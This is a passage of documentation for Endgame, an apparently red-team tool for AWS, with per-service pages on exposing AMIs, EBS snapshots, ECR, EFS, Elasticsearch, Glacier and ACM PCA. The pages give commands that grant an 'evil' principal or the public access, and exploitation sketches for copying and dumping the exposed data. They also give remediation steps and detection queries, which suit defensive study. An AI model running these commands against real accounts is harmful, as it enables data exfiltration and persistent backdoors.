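      "Action": ["s3:GetObject", "s3:ListBucket"],
      "Resource": [
        "arn:aws:s3:::victim-example-bucket",
        "arn:aws:s3:::victim-example-bucket/*"
      ]
    }
  ]
}
EOF

aws s3api put-bucket-policy \
  --bucket victim-example-bucket \
  --policy file://cross-account-policy.json
```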
## What This Means for Defenders
### How Endgame Works
The prerequisite for an attacker running Endgame is that they have access to AWS API credentials for the victim account which have privileges to update resource policies.
Endgame can run in two modes, `expose` or `smash`. The less-destructive `expose` mode is surgical, updating the resource policy on a single attacker-defined resource to include a back door to a principal they control (or the internet if they're mean).
`smash`, on the other hand, is more destructive (and louder). `smash` can run on a single service or all supported services. In either case, for each service it enumerates a list of resources in that region, reads the current resource policy on each, and applies a new policy which includes the "evil principal" the attacker has specified. The net effect of this is that depending on the privileges they have in the victim account, an attacker can insert dozens of back doors which are not controlled by the victim's IAM policies.
These back doors largely grant access to accomplish data exfiltration from buckets, snapshots, etc. However, other things could be possible depending on the victim account's architecture. For example, an attacker could use these back doors to:
* Escalate privileges by enabling the attacker's evil principal to assume roles in the victim account
* Manipulate CI/CD pipelines which rely on AWS S3 as an artifact source
* Modify Lambda functions to include back doors, skimmers, etc for Lambda-based serverless applications
* Invoke Lambda functions with unfiltered input, bypassing API Gateway for serverless APIs
* Provide attacker-defined input to applications which leverage SQS or SNS for work control
* Pivot to other applications which have credentials stored in Secrets Manager
* And more!
### Incident Identification & Containment Steps
In incidents where resource policies may have been modified (can be determined using CloudTrail, see [risks](/docs/risks/)), each resource policy should be reviewed to identify potential back doors or unintended internet exposure. The attacker's interactions with these resources should also be reviewed where possible.
CloudTrail only logs data-level events (S3 object retrieval, Lambda function invocation, etc) for three services: S3, Lambda, and KMS. This visibility is also not enabled by default on trails. Other management-level events such as manipulation of Lambda function code will be visible in a standard management-event CloudTrail trail. Further documentation for working with CloudTrail can be found [here](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-getting-started.html).

docs/risks/acm-pca.md
# ACM Private Certificate Authority (PCA)
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [References](#references)
## Steps to Reproduce
* ‼️ If you are using the Terraform demo infrastructure, you must take some follow-up steps after provisioning the resources in order to be able to expose the demo resource. This is due to how ACM PCA works. For instructions, see the [Appendix on ACM PCA Activation](../appendices/acm-pca-activation.md)
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
export CERTIFICATE_ID=12345678-1234-1234-1234-123456789012
endgame expose --service acm-pca --name $CERTIFICATE_ID
```
* To view the contents of the ACM PCA resource policy, run the following:
```bash
export AWS_REGION=us-east-1
export VICTIM_ACCOUNT_ID=111122223333
export CERTIFICATE_ID=12345678-1234-1234-1234-123456789012
export CERTIFICATE_ARN=arn:aws:acm-pca:$AWS_REGION:$VICTIM_ACCOUNT_ID:certificate-authority/$CERTIFICATE_ID
aws acm-pca list-permissions --certificate-authority-arn $CERTIFICATE_ARN
```
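* To retrieve the CA's resource-based policy itself (as opposed to its permissions), a minimal sketch using the same `$CERTIFICATE_ARN`; note that `get-policy` returns an error if no policy has been attached yet:
```bash
aws acm-pca get-policy --resource-arn $CERTIFICATE_ARN
```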
* Observe that the contents of the overly permissive resource-based policy match the example shown below.
## Example
```json
{
    "Permissions": [
        {
            "Actions": [
                "IssueCertificate",
                "GetCertificate",
                "ListPermissions"
            ],
            "CertificateAuthorityArn": "arn:aws:acm:us-east-1:111122223333:certificate/12345678-1234-1234-1234-123456789012",
            "CreatedAt": 1.516130652887E9,
            "Principal": "acm.amazonaws.com",
            "SourceAccount": "111122223333"
        }
    ]
}
```
## Exploitation
```
TODO
```
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
* **Trusted Accounts Only**: Ensure that AWS PCA Certificates are only shared with trusted accounts, and that the trusted accounts truly need access to the Certificates.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to exposing usage of your private CAs**: Tightly control access to the following IAM actions:
- [acm-pca:GetPolicy](https://docs.aws.amazon.com/acm-pca/latest/APIReference/API_GetPolicy.html): _Retrieves the policy on an ACM Private CA._
- [acm-pca:PutPolicy](https://docs.aws.amazon.com/acm-pca/latest/APIReference/API_PutPolicy.html): _Puts a policy on an ACM Private CA._
- [acm-pca:DeletePolicy](https://docs.aws.amazon.com/acm-pca/latest/APIReference/API_DeletePolicy.html): _Deletes the policy for an ACM Private CA._
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## References
* [Attaching a Resource-based Policy for Cross Account Access in ACM PCA](https://docs.aws.amazon.com/acm-pca/latest/userguide/pca-rbp.html)
* [GetPolicy](https://docs.aws.amazon.com/acm-pca/latest/APIReference/API_GetPolicy.html)
* [PutPolicy](https://docs.aws.amazon.com/acm-pca/latest/APIReference/API_PutPolicy.html)
* [DeletePolicy](https://docs.aws.amazon.com/acm-pca/latest/APIReference/API_DeletePolicy.html)

docs/risks/amis.md
# EC2 AMIs (Machine Images)
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=*
export IMAGE_ID=ami-5731123e
endgame expose --service ebs --name $IMAGE_ID
```
* To expose the resource using AWS CLI, run the following from the victim account:
```bash
aws ec2 modify-image-attribute \
--image-id ami-5731123e \
--launch-permission "Add=[{Group=all}]"
```
* To validate that the resource has been shared publicly, run the following:
```bash
aws ec2 describe-image-attribute \
--image-id ami-5731123e \
--attribute launchPermission
```
* Observe that the contents of the exposed AMI match the example shown below.
## Example
The output of `aws ec2 describe-image-attribute` reveals that the AMI is public if the value of `Group` under `LaunchPermissions` is equal to `all`.
```json
{
    "LaunchPermissions": [
        {
            "Group": "all"
        }
    ],
    "ImageId": "ami-5731123e"
}
```
```
## Exploitation
After an EC2 AMI is made public, an attacker can then:
* [Copy the AMI](https://docs.aws.amazon.com/cli/latest/reference/ec2/copy-image.html) into their own account
* Launch an EC2 instance using that AMI and browse the contents of the disk, potentially revealing sensitive or otherwise non-public information.
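For example, from the attacker's account (a minimal sketch; the copied AMI ID, instance type, and regions below are hypothetical):
```bash
# Copy the public AMI into the attacker's account
aws ec2 copy-image \
  --source-image-id ami-5731123e \
  --source-region us-east-1 \
  --region us-east-1 \
  --name copied-victim-ami

# Launch an instance from the copied AMI (hypothetical AMI ID returned by copy-image)
aws ec2 run-instances \
  --image-id ami-0abcdef1234567890 \
  --instance-type t3.micro \
  --count 1
```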
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
* **Encrypt all AMIs with Customer-Managed Keys**: Follow the encryption-related recommendations in the [Prevention Guide](https://endgame.readthedocs.io/en/latest/prevention/#use-aws-kms-customer-managed-keys)
* **Trusted Accounts Only**: Ensure that EC2 AMIs are only shared with trusted accounts, and that the trusted accounts truly need access to the EC2 AMIs.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to exposure of your AMIs**: Tightly control access to the following IAM actions:
- [ec2:ModifyImageAttribute](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ModifyImageAttribute.html): _Grants permission to modify an attribute of an Amazon Machine Image (AMI)_
- [ec2:DescribeImageAttribute](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeImageAttribute.html): _Grants permission to describe an attribute of an Amazon Machine Image (AMI). This includes information on which accounts have access to the AMI_
- [ec2:DescribeImages](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeImages.html): _Grants permission to describe one or more images (AMIs, AKIs, and ARIs)_
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='ec2.amazonaws.com' and (eventName='ModifyImageAttribute' and requestParameters.attributeType='launchPermission')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
- [aws ec2 modify-image-attribute](https://docs.aws.amazon.com/cli/latest/reference/ec2/modify-image-attribute.html)
- [aws ec2 describe-image-attribute](https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-image-attribute.html)

docs/risks/ebs.md
# EBS Snapshot Exposure
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=*
export SNAPSHOT_ID=snap-1234567890abcdef0
endgame expose --service ebs --name $SNAPSHOT_ID
```
* To expose the resource using the AWS CLI, run the following from the victim account:
```bash
export SNAPSHOT_ID=snap-1234567890abcdef0
aws ec2 modify-snapshot-attribute \
--snapshot-id $SNAPSHOT_ID \
--attribute createVolumePermission \
--operation-type add \
--group-names all
```
* To verify that the snapshot has been shared with the public, run the following from the victim account:
```bash
export SNAPSHOT_ID=snap-1234567890abcdef0
aws ec2 describe-snapshot-attribute \
--snapshot-id $SNAPSHOT_ID \
--attribute createVolumePermission
```
* Observe that the contents match the example shown below.
## Example
The response of `aws ec2 describe-snapshot-attribute` will match the below, indicating that the EBS snapshot is public.
```json
{
"SnapshotId": "snap-066877671789bd71b",
"CreateVolumePermissions": [
{
"Group": "all"
}
]
}
```
## Exploitation
After an EBS Snapshot is made public, an attacker can then:
* [copy the public snapshot](https://docs.aws.amazon.com/cli/latest/reference/ec2/copy-snapshot.html) to their own account
* Use the snapshot to create an EBS volume
* Attach the EBS volume to their own EC2 instance and browse the contents of the disk, potentially revealing sensitive or otherwise non-public information.
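For example, from the attacker's account (a minimal sketch; the snapshot, volume, and instance IDs below are hypothetical):
```bash
# Copy the public snapshot into the attacker's account
aws ec2 copy-snapshot \
  --source-snapshot-id snap-1234567890abcdef0 \
  --source-region us-east-1 \
  --region us-east-1 \
  --description "Copied public snapshot"

# Create a volume from the copied snapshot (hypothetical snapshot ID returned by copy-snapshot)
aws ec2 create-volume \
  --snapshot-id snap-0abcdef1234567890 \
  --availability-zone us-east-1a

# Attach the volume to an attacker-owned EC2 instance and browse the filesystem
aws ec2 attach-volume \
  --volume-id vol-0abcdef1234567890 \
  --instance-id i-0abcdef1234567890 \
  --device /dev/sdf
```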
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
* **Encrypt all Snapshots with Customer-Managed Keys**: Follow the encryption-related recommendations in the [Prevention Guide](https://endgame.readthedocs.io/en/latest/prevention/#use-aws-kms-customer-managed-keys)
* **Trusted Accounts Only**: Ensure that EBS Snapshots are only shared with trusted accounts, and that the trusted accounts truly need access to the EBS Snapshot.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to exposure of your EBS Snapshots**: Tightly control access to the following IAM actions:
- [ec2:ModifySnapshotAttribute](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ModifySnapshotAttribute.html): _Grants permission to add or remove permission settings for a snapshot_
- [ec2:DescribeSnapshotAttribute](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSnapshotAttribute.html): _Grants permission to describe an attribute of a snapshot. This includes information on which accounts the snapshot has been shared with._
- [ec2:DescribeSnapshots](https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSnapshots.html): _Grants permission to describe one or more EBS snapshots_
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='ec2.amazonaws.com' and (eventName='ModifySnapshotAttribute' and requestParameters.attributeType='CREATE_VOLUME_PERMISSION')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [Sharing an Unencrypted Snapshot using the Console](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html#share-unencrypted-snapshot)
* [Share a snapshot using the command line](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html)
* [aws ec2 copy-snapshot](https://docs.aws.amazon.com/cli/latest/reference/ec2/copy-snapshot.html)

docs/risks/ecr.md
# Elastic Container Registries (ECR)
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service ecr --name test-resource-exposure
```
* Alternatively, to expose the resource using the AWS CLI:
Create a file named `ecr-policy.json` with the following contents:
```json
{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:*"
]
}
]
}
```
Then run the following from the victim account:
```bash
aws ecr set-repository-policy --repository-name test-resource-exposure --policy-text file://ecr-policy.json
```
* To view the contents of the exposed resource policy, run the following:
```bash
aws ecr get-repository-policy \
--repository-name test-resource-exposure
```
* Observe that the contents match the example shown below.
## Example
The policy shown below grants access to the Principal `*`. If the Principal in the output contains `*`, the ECR repository is public. If the Principal contains only an account ID, the repository is shared with that specific account.
```json
{
"registryId": "111122223333",
"repositoryName": "test-resource-exposure",
"policyText": "{\n \"Version\" : \"2008-10-17\",\n \"Statement\" : [ {\n \"Sid\" : \"allow public pull\",\n \"Effect\" : \"Allow\",\n \"Principal\" : \"*\",\n \"Action\" : \"ecr:*\"\n } ]\n}"
}
```
## Exploitation
```
TODO
```
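One possible exploitation sketch, assuming the repository policy above is in place, the attacker has Docker and the AWS CLI configured with the evil principal's credentials, and an image tagged `latest` exists (the tag is a placeholder):
```bash
# Enumerate images in the victim repository (registry-id is the victim account)
aws ecr list-images \
  --registry-id 111122223333 \
  --repository-name test-resource-exposure

# Authenticate Docker against the victim registry using the attacker's own credentials
aws ecr get-login-password --region us-east-1 | \
  docker login --username AWS --password-stdin 111122223333.dkr.ecr.us-east-1.amazonaws.com

# Pull (exfiltrate) the exposed image
docker pull 111122223333.dkr.ecr.us-east-1.amazonaws.com/test-resource-exposure:latest
```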
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
* **Leverage Strong Resource-based Policies**: Follow the resource-based policy recommendations in the [Prevention Guide](https://endgame.readthedocs.io/en/latest/prevention/#leverage-strong-resource-based-policies)
* **Trusted Accounts Only**: Ensure that ECR Repositories are only shared with trusted accounts, and that the trusted accounts truly need access to the ECR Repository.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to exposure of your ECR Repositories**: Tightly control access to the following IAM actions:
- [ecr:SetRepositoryPolicy](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_SetRepositoryPolicy.html): _Grants permission to apply a repository policy on a specified repository to control access permissions_
- [ecr:DeleteRepositoryPolicy](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_DeleteRepositoryPolicy.html): _Grants permission to delete the repository policy from a specified repository_
- [ecr:GetRepositoryPolicy](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_GetRepositoryPolicy.html): _Grants permission to retrieve the repository policy for a specified repository_
- [ecr:DescribeRepositories](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_DescribeRepositories.html): _Grants permission to describe image repositories in a registry_
- [ecr:PutRegistryPolicy](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_PutRegistryPolicy.html): _Grants permission to update the registry policy_
- [ecr:DeleteRegistryPolicy](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_DeleteRegistryPolicy.html): _Grants permission to delete the registry policy_
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
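To support the recommendations above, an unexpected or malicious repository policy can also be reviewed and removed directly; a minimal sketch:
```bash
# Review the current repository policy
aws ecr get-repository-policy --repository-name test-resource-exposure

# Remove the repository policy entirely (access then falls back to IAM-only)
aws ecr delete-repository-policy --repository-name test-resource-exposure
```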
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='ecr.amazonaws.com' and (eventName='SetRepositoryPolicy' or eventName='DeleteRepositoryPolicy'
or eventName='PutRegistryPolicy' or eventName='DeleteRegistryPolicy')
```
The following query detects policy modifications which include the default IOC string:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='ecr.amazonaws.com' and (eventName='SetRepositoryPolicy' and responseElements.policyText like 'Endgame')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [set-repository-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ecr/set-repository-policy.html)

122
docs/risks/efs.md Normal file
View File

@ -0,0 +1,122 @@
# Elastic File Systems (EFS)
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
> Note: The Terraform demo infrastructure will output the EFS File System ID. If you are using the Terraform demo infrastructure, supply that file system ID in the `--name` parameter.
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service efs --name fs-01234567
```
* Alternatively, to expose the resource using the AWS CLI, run the following from the victim account:
```bash
aws efs put-file-system-policy --file-system-id fs-01234567 --policy '{
"Version": "2012-10-17",
"Id": "read-only-example-policy02",
"Statement": [
{
"Sid": "AllowEverybody",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"elasticfilesystem:*"
],
"Resource": "*"
}
]
}'
```
* To view the contents of the file system policy, run the following:
```bash
aws efs describe-file-system-policy \
--file-system-id fs-01234567
```
* Observe that the contents of the overly permissive resource-based policy match the example shown below.
## Example
The policy below grants the evil principal (`arn:aws:iam::999988887777:user/evil`) `elasticfilesystem:*` access to the file system.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowCurrentAccount",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::111122223333:root"
},
"Action": "elasticfilesystem:*",
"Resource": "arn:aws:elasticfilesystem:us-east-1:111122223333:file-system/fs-01234567"
},
{
"Sid": "Endgame",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::999988887777:user/evil"
},
"Action": "elasticfilesystem:*",
"Resource": "arn:aws:elasticfilesystem:us-east-1:111122223333:file-system/fs-01234567"
}
]
}
```
## Exploitation
```
TODO
```
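One possible exploitation sketch: because EFS mount targets live inside the victim's VPC, the resource policy alone is not enough; the attacker also needs network reachability to a mount target (for example via VPC peering or a compromised host on a routable network). Assuming that reachability, `amazon-efs-utils` installed, and a reachable mount target IP of `10.0.1.25` (a placeholder), the attacker could mount the file system using IAM authorization:
```bash
# Mount the victim file system over TLS, authenticating as the attacker's IAM identity
sudo mkdir -p /mnt/victim-efs
sudo mount -t efs -o tls,iam,mounttargetip=10.0.1.25 fs-01234567:/ /mnt/victim-efs

# Browse or copy out the contents
ls -la /mnt/victim-efs
```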
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
* **Block Public Access to the EFS File System**: Follow the EFS Guidance [here](https://docs.aws.amazon.com/efs/latest/ug/access-control-block-public-access.html) to block public access to the EFS File Systems.
* **Leverage Strong Resource-based Policies**: Follow the resource-based policy recommendations in the [Prevention Guide](https://endgame.readthedocs.io/en/latest/prevention/#leverage-strong-resource-based-policies)
* **Trusted Accounts Only**: Ensure that EFS File Systems are only shared with trusted accounts, and that the trusted accounts truly need access to the File System.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to exposure of your EFS File Systems**: Tightly control access to the following IAM actions:
- [elasticfilesystem:PutFileSystemPolicy](https://docs.aws.amazon.com/efs/latest/ug/API_PutFileSystemPolicy.html): _Grants permission to apply a resource-level policy that defines the actions allowed or denied from given actors for the specified file system_
- [elasticfilesystem:DescribeFileSystems](https://docs.aws.amazon.com/efs/latest/ug/API_DescribeFileSystems.html): _Grants permission to view the description of an Amazon EFS file system specified by file system CreationToken or FileSystemId; or to view the description of all file systems owned by the caller's AWS account in the AWS region of the endpoint that is being called_
- [elasticfilesystem:DescribeFileSystemPolicy](https://docs.aws.amazon.com/efs/latest/ug/API_DescribeFileSystemPolicy.html): _Grants permission to view the resource-level policy for an Amazon EFS file system_
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='elasticfilesystem.amazonaws.com' and eventName='PutFileSystemPolicy'
```
The following query detects policy modifications which include the default IOC string:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='elasticfilesystem.amazonaws.com' and (eventName='PutFileSystemPolicy' and requestParameters.policy like 'Endgame')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [put-filesystem-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/efs/put-file-system-policy.html)
* [Creating File System Policies](https://docs.aws.amazon.com/efs/latest/ug/create-file-system-policy.html)

84
docs/risks/es.md Normal file
View File

@ -0,0 +1,84 @@
# ElasticSearch Domains
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
> Note: The **Network Configuration** settings in ElasticSearch clusters offer two options - **VPC Access** or **Public access**. If VPC access is used, modification of the resource-based policy - whether using `endgame` or the CLI exploitation method - will not result in access to the internet. `endgame` only modifies the resource-based policy for the ElasticSearch cluster, so this will only expose ElasticSearch clusters that are set to **Public access**.
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service elasticsearch --name test-resource-exposure
```
* To get the content of the resource-based policy for ElasticSearch domain config, run the following command from the victim account:
```bash
aws es describe-elasticsearch-domain-config --domain-name test-resource-exposure
```
## Example
The response will contain a field titled `AccessPolicies`, whose content resembles the example below. Observe that the victim resource (`arn:aws:es:us-east-1:111122223333:domain/test-resource-exposure`) allows access to `*` principals, indicating a successful compromise.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "es:*",
"Resource": "arn:aws:es:us-east-1:999988887777:domain/test-resource-exposure/*"
}
]
}
```
## Exploitation
```
TODO
```
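One possible exploitation sketch, assuming the domain uses **Public access** and the policy above is applied. The endpoint below is a placeholder; the real one can be read from `describe-elasticsearch-domain`. A tool such as [awscurl](https://github.com/okigan/awscurl) signs requests with the attacker's credentials (with a `*` principal and no IP conditions, plain `curl` may also work):
```bash
# Placeholder endpoint - retrieve the real one with:
#   aws es describe-elasticsearch-domain --domain-name test-resource-exposure --query 'DomainStatus.Endpoint'
export VICTIM_ES_ENDPOINT=search-test-resource-exposure-abc123.us-east-1.es.amazonaws.com

# Enumerate indices
awscurl --service es --region us-east-1 "https://$VICTIM_ES_ENDPOINT/_cat/indices?v"

# Dump documents from an index of interest (the index name is a placeholder)
awscurl --service es --region us-east-1 "https://$VICTIM_ES_ENDPOINT/customers/_search?size=100"
```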
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
The **Network Configuration** settings in ElasticSearch clusters offer two options - **VPC Access** or **Public access**. If VPC access is used, modification of the resource-based policy - whether using `endgame` or the CLI exploitation method - will not result in access to the internet. `endgame` only modifies the resource-based policy for the ElasticSearch cluster, so this will only expose ElasticSearch clusters that are set to **Public access**.
* Consider Migrating from Public Access to VPC Access, if possible. This will help you avoid a situation where an attacker could expose your ElasticSearch cluster to the internet with a single API call. For more information, see the documentation on [Migrating from Public Access to VPC Access](https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html#es-migrating-public-to-vpc).
However, if **Public Access** _is_ necessary, follow the steps below to remediate this risk and reduce the likelihood that a compromise in your AWS account could lead to exposure of your ElasticSearch cluster.
* **Trusted Accounts Only**: Ensure that ElasticSearch Clusters are only shared with trusted accounts, and that the trusted accounts truly need access to the ElasticSearch cluster.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to exposure of your ElasticSearch Clusters**: Tightly control access to the following IAM actions:
- [es:UpdateElasticsearchDomainConfig](https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-configuration-api.html#es-configuration-api-actions-updateelasticsearchdomainconfig): _Grants permission to modify the configuration of an Amazon ES domain, which includes the Resource-Based Policy (RBP) content. The RBP can be modified to allow access from external IAM principals or from the internet._
- [es:DescribeElasticsearchDomainConfig](https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-configuration-api.html#es-configuration-api-actions-describeelasticsearchdomainconfig): _Grants permission to view a description of the configuration options and status of an Amazon ES domain. This includes the Resource Based Policy content, which contains information on which IAM principals are authorized to access the cluster._
- [es:ListDomainNames](https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-configuration-api.html#es-configuration-api-actions-listdomainnames): _Grants permission to display the names of all Amazon ES domains that the current user owns._
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='es.amazonaws.com' and eventName='UpdateElasticsearchDomainConfig'
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [ElasticSearch Resource-based Policies](https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-ac.html#es-ac-types-resource)
* [Migrating from Public Access to VPC Access](https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html#es-migrating-public-to-vpc)

82
docs/risks/glacier.md Normal file
View File

@ -0,0 +1,82 @@
# Glacier Vault
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service glacier --name test-resource-exposure
```
* To view the contents of the Glacier Vault Access Policy, run the following:
```bash
export VICTIM_ACCOUNT_ID=111122223333
aws glacier get-vault-access-policy \
--account-id $VICTIM_ACCOUNT_ID \
--vault-name test-resource-exposure
```
* Observe that the output of the overly permissive Glacier Vault access policy resembles the example shown below.
## Example
Observe that the policy below allows the evil principal (`arn:aws:iam::999988887777:user/evil`) the `glacier:*` permissions to the Glacier Vault named `test-resource-exposure`.
```json
{
"policy": {
"Policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Sid\":\"AllowCurrentAccount\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::111122223333:root\"},\"Action\":\"glacier:*\",\"Resource\":\"arn:aws:glacier:us-east-1:111122223333:vaults/test-resource-exposure\"},{\"Sid\":\"Endgame\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:user/evil\"},\"Action\":\"glacier:*\",\"Resource\":\"arn:aws:glacier:us-east-1:111122223333:vaults/test-resource-exposure\"}]}"
}
}
```
## Exploitation
```
TODO
```
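One possible exploitation sketch, using the attacker's credentials against the victim's vault. Note that Glacier inventory-retrieval jobs typically take several hours to complete; the job ID is captured from the response:
```bash
export VICTIM_ACCOUNT_ID=111122223333

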